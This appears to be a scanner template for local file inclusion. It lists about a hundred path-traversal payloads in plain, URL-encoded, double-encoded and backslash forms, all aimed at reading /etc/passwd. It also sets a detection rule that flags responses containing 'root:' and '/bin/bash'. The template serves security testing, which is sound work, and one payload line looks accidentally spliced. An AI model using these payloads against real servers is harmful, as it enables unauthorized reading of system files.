id: lfi-04
type: fuzz
level: 1
info:
  name: LFI on Path
  risk: High

payloads:
    - '../..//etc/passwd'
    - '../../..//etc/passwd'
    - '../../../..//etc/passwd'
    - '../../../../..//etc/passwd'
    - '../../../../../..//etc/passwd'
    - '../../../../../../../..//etc/passwd'
    - '..%2f/etc/passwd'
    - '..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd'
    - '%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
    - '%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
    - '..%252f/etc/passwd'
    - '..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd'
    - '%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd'
    - '%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd'
    - '..\/etc/passwd'
    - '..\..\/etc/passwd'
    - '..\..\..\/etc/passwd'
    - '..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\..\..\/etc/passwd'
    - '..\..\..\..\..\..\..\..\/etc/passwd'
    - '..%255c/etc/passwd'
    - '..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd'
    - '%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd'
    - '..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
    - '%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd'
    - '%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd'
    - '%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd'
    - '%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd'
requests:
  - generators:
      - Path("{{.payload}}", "*")
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash")